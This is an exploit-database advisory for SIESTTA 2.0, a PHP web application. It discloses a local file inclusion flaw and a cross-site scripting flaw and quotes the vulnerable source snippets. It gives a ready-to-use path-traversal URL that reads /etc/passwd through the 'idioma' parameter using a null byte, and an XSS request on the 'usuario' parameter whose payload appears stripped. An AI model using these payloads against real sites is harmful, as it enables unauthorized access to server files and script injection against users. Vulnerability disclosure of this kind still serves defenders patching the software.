SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities

2010-04-15T00:00:00
ID 1337DAY-ID-11829
Type zdt
Reporter JosS
Modified 2010-04-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================
SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
==============================================

####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://ramoncastro.es/siestta_old/
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# "need" register_globals = On
#
####################################################################


- [#LFI]


require('idioma/'.$idioma.'');
...
?>

!EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00

- [#XSS]

...
$usuario = $_GET['usuario'];
$imagen = 'admin/fotos_al/'.$usuario.'.jpg';
echo '


'.$usuario.'

...
?>

!EXPLOIT: /carga_foto_al.php?usuario=

__h0__ 



#  0day.today [2018-02-16]  #